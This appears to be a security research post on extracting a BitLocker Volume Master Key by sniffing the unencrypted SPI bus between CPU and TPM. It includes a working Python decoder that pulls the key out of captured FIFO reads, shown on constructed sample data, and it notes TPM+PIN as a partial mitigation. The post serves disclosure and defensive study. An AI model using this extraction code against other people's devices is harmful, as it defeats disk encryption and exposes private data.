Full disk encryption is one of the cornerstones of modern endpoint protection. It is an effective way to protect sensitive data against physical theft, and it also raises the bar for offline tampering with data at rest (note that common full disk encryption modes provide no cryptographic integrity check, so this is a weaker guarantee than confidentiality). If this protection could be bypassed without significant effort, it would undermine the fundamental idea of endpoint protection.
Over time there have been many different physical attacks against full disk encryption, such as the Cold Boot attacks that we have previously researched. In addition, various attacks based on TPM interface sniffing or DMA have been used to gain access to the encryption key.
In this post, we research a sniffing attack against the SPI interface of a Trusted Platform Module (TPM) using publicly available tools at a reasonable cost. In addition, we release a tool which extracts the BitLocker key (the Volume Master Key that the TPM unseals during boot) from the sniffed SPI traffic.
A TPM is often used to seal the full disk encryption key, and the chip itself is typically hardened against a wide range of physical attacks. However, the communication between the CPU and the TPM is not encrypted by default: TPM 2.0 does support encrypted sessions (parameter encryption), but BitLocker does not use them for the boot-time unseal, so the key crosses the bus in plaintext and anyone who can probe the bus can capture it. A TPM+PIN protector mitigates this for a stolen device, because the TPM will not unseal the key until the PIN is entered; it does not help against a sniffer left in place while the legitimate user boots the machine.
Capturing TPM communication is not a new idea. For example, D. Andzakovic demonstrated BitLocker key extraction from the LPC bus, and J. Boone researched an interposer attack against the I2C bus. However, there was no public research on sniffing TPM communication from the SPI bus.
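To make the sniffing and extraction steps concrete, here is an added example in Python that is not the tool released with this post and uses no real capture data. It decodes TIS-over-SPI transactions from a MOSI/MISO byte stream, reassembles everything the host read from the TPM data FIFO (so a key that straddles two FIFO reads is still recovered) and searches that stream for the Volume Master Key. It assumes the frame layout from the TCG PC Client Platform TPM Profile (header byte with bit 7 = read and bits 5:0 = length minus one, three address bytes, wait states signalled by bit 0 of MISO) and the 12-byte marker preceding the VMK that the public LPC extraction searched for; both are assumptions here, the register addresses are the locality 0 TIS addresses, and the sample capture is constructed in `sample_capture()`.

```python
"""Added example: decode TIS-over-SPI transactions and pull a BitLocker VMK out of
the bytes the host reads from the TPM data FIFO. All sample data is constructed."""

# Locality-0 TIS register addresses (0xD40000 base) for TPM_STS and TPM_DATA_FIFO.
TPM_STS = 0xD40018
TPM_DATA_FIFO = 0xD40024

# Assumed 12-byte marker that precedes the 32-byte VMK inside the TPM2_Unseal
# response; the public LPC extraction searched for the same pattern.
VMK_HEADER = bytes.fromhex("2c0000000100000003200000")
VMK_LEN = 32


def build_transaction(is_read, addr, data, wait_states=0):
    """Encode one SPI transaction as it appears on the wire and return (mosi, miso)
    byte strings of equal length. Only used here to construct the sample capture."""
    if not 1 <= len(data) <= 64:
        raise ValueError("a TIS SPI transaction carries 1..64 bytes")
    header = bytes([(0x80 if is_read else 0x00) | (len(data) - 1)]) + addr.to_bytes(3, "big")
    mosi = bytearray(header)
    # The TPM signals flow control in bit 0 of MISO during the last address byte:
    # 1 = ready, 0 = wait states follow until a byte with bit 0 set arrives.
    miso = bytearray(b"\x00\x00\x00" + (b"\x00" if wait_states else b"\x01"))
    if wait_states:
        mosi += b"\x00" * wait_states
        miso += b"\x00" * (wait_states - 1) + b"\x01"
    if is_read:
        mosi += b"\x00" * len(data)   # master clocks dummy bytes
        miso += bytes(data)           # TPM drives the register contents
    else:
        mosi += bytes(data)
        miso += b"\x00" * len(data)
    return bytes(mosi), bytes(miso)


def decode_transactions(mosi, miso):
    """Split a raw capture into (is_read, address, data) tuples."""
    txns = []
    i, n = 0, min(len(mosi), len(miso))
    while i + 4 <= n:
        hdr = mosi[i]
        is_read = bool(hdr & 0x80)
        length = (hdr & 0x3F) + 1
        addr = int.from_bytes(mosi[i + 1:i + 4], "big")
        i += 4
        # Bit 0 of MISO on the last address byte clear means wait states: keep
        # clocking until the TPM answers with a byte whose bit 0 is set.
        if miso[i - 1] & 0x01 == 0:
            while i < n and miso[i] & 0x01 == 0:
                i += 1
            i += 1  # consume the 'ready' byte
        if i + length > n:
            break   # truncated capture, nothing more to decode
        data = miso[i:i + length] if is_read else mosi[i:i + length]
        txns.append((is_read, addr, bytes(data)))
        i += length
    return txns


def extract_vmk(txns):
    """Concatenate all FIFO reads (the response direction) and look for the marker.
    Returns the 32-byte key or None when the marker or the full key is missing."""
    stream = b"".join(d for r, a, d in txns if r and a == TPM_DATA_FIFO)
    pos = stream.find(VMK_HEADER)
    if pos < 0 or len(stream) < pos + len(VMK_HEADER) + VMK_LEN:
        return None
    start = pos + len(VMK_HEADER)
    return stream[start:start + VMK_LEN]


def sample_capture():
    """Constructed capture (not real data): a command fragment written to the FIFO,
    one status poll, then a 60-byte response read back in 16-byte FIFO reads. The
    marker and the key straddle read boundaries and two reads carry wait states."""
    fake_vmk = bytes(range(0xA0, 0xC0))              # 32 constructed bytes, not a real key
    response = bytes.fromhex("80010000003a00000000") + VMK_HEADER + fake_vmk + bytes(6)
    chunks = [response[i:i + 16] for i in range(0, len(response), 16)]
    transactions = [build_transaction(False, TPM_DATA_FIFO, bytes.fromhex("8002000000"), 0),
                    build_transaction(True, TPM_STS, b"\x90", 0)]
    for chunk, waits in zip(chunks, (0, 3, 0, 1)):
        transactions.append(build_transaction(True, TPM_DATA_FIFO, chunk, waits))
    mosi = b"".join(m for m, _ in transactions)
    miso = b"".join(s for _, s in transactions)
    return mosi, miso, fake_vmk


if __name__ == "__main__":
    mosi, miso, expected = sample_capture()
    key = extract_vmk(decode_transactions(mosi, miso))
    print("VMK:", key.hex() if key else "not found",
          "(matches constructed key)" if key == expected else "")
```

Only reads from the data FIFO are collected because the unseal response travels from TPM to host; command writes to the same address are ignored so that command bytes cannot produce a false match. On a real logic-analyser export you would feed the decoder the MOSI and MISO channels of the transfer, which is exactly what the constructed `sample_capture()` stands in for here.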